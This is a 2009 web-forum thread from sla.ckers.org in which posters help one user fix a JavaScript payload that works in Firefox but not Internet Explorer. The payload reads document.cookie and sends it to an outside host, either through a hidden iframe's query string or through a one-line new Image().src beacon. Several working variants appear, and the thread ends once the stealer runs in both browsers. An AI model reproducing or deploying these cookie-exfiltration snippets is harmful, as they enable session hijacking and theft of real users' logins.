Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Dynamic Iframe on IE [SOLVED]
Posted by: p0c
Date: April 05, 2009 09:33AM

Hey all,

I finally got my dynamic Iframe creation working on FF, but I can't seem to figure out why this wont work on IE. Is anyone familiar with this, and does anyone know a workaround? I searched the forums, but couldn't find anything..

The script:

var url = "http://site.com/script.php";
url = url + "?pew=" + document.cookie;
var body = document.getElementsByTagName('body').item(0);
var iframe = document.createElement('iframe');
iframe.src = url;
iframe.setAttribute("style", "display:none;");
body.appendChild(iframe);

Thanks in advance!

*EDIT* Hope I posted this in the right section..



Edited 2 time(s). Last edit at 04/07/2009 01:36PM by p0c.

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: Gareth Heyes
Date: April 05, 2009 12:04PM

I'd do it like this:-

var url = "http://site.com/script.php";
url = url + "?pew=" + document.cookie;
var iframe = document.createElement('iframe');
iframe.src = url;
iframe.style.display = 'none';
document.body.appendChild(iframe);

Not tested it but it should work

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 05, 2009 01:15PM

Thanks for your reply Gareth. Unfortunately this doesn't work either.. It does in FF, but not in IE.



Edited 1 time(s). Last edit at 04/05/2009 01:16PM by p0c.

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: Gareth Heyes
Date: April 05, 2009 01:25PM

try it with a :-

window.onload = function() {
var url = "http://site.com/script.php";
url = url + "?pew=" + document.cookie;
var iframe = document.createElement('iframe');
iframe.src = url;
iframe.style.display = 'none';
document.body.appendChild(iframe);
}

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 05, 2009 02:05PM

Not working in IE and FF this time..

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 05, 2009 02:33PM

If there's another way to do this (load an iframe of 1px x 1px and do a GET to a external URL) that works in both IE and FF I'm also very satisfied.. ;)

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: backbone
Date: April 05, 2009 10:02PM

I use to do it without iframes
new Image().src="http://site.com/script.php?pew="+encodeURI(document.cookie);

---
blog [-] microblog

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 06, 2009 04:25AM

And once again only working in FF, not in IE.. :(

Anyone another idea?

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: Gareth Heyes
Date: April 06, 2009 05:54AM

Yeah you are doing something wrong.

The iframe works on IE & FF and the new image also works. I've used these techniques many times.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 06, 2009 07:26AM

Strange, I have no idea what I'm doing wrong then. There must be a difference between IE en FF, since most of these work only in FF..?

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: Gareth Heyes
Date: April 06, 2009 10:04AM

@p0c

maybe it's something to do with how you are encoding the payload. Make sure you use encodeURIComponent

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Dynamic Iframe on IE
Posted by: p0c
Date: April 07, 2009 01:35PM

Hmmz it was a stupid <enter> that caused the problems in IE :')

Thanks for all your help Gareth Heyes / backbone, I really appreciate it!

Options: ReplyQuote


Sorry, only registered users may post in this forum.